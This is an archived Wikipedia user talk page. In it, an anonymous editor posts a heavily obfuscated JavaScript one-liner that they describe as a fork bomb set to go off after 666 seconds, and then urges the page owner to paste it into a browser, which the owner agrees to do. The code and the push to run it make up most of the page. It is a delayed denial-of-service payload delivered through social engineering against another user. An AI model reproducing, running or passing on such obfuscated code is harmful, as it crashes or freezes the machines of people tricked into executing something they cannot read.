User talk:CLCStudent/Archive 56

Page contents not supported in other languages.
From Wikipedia, the free encyclopedia
Archive 50 Archive 54 Archive 55 Archive 56 Archive 57 Archive 58 Archive 60

Fork bomb example

Can you explain what is wrong with my 666 second fork bomb? ((f)=>{setInterval(f,1000);})(((f)=>f(f))((f)=>(n)=>n?((x)=>(y)=>x(f(f)(n-1)(x)(y))):((x)=>(y)=>y))(666)(((x)=>(y)=>y(x))(()=>null))(((f)=>f(f))((f)=>(a)=>(b)=>((b)?(()=>f(f)(a(b))):(()=>(a().pop()()||1)?f(f)(a):0))())(((f)=>f(f))((f)=>(a)=>(b)=>b?f(f)(a.concat(b)):a)([]))(((f)=>f(f))((f)=>async()=>f(f)(f(f)()))))()); 69.5.123.41 (talk) 02:40, 5 October 2019 (UTC)

Try plugging it into your browser and wait 666 seconds? 666 seconds later and it will fork bomb. 69.5.123.41 (talk) 02:42, 5 October 2019 (UTC)
Ok, let me try. CLCStudent (talk) 02:43, 5 October 2019 (UTC)
Did it work? 69.5.123.41 (talk) 03:22, 5 October 2019 (UTC)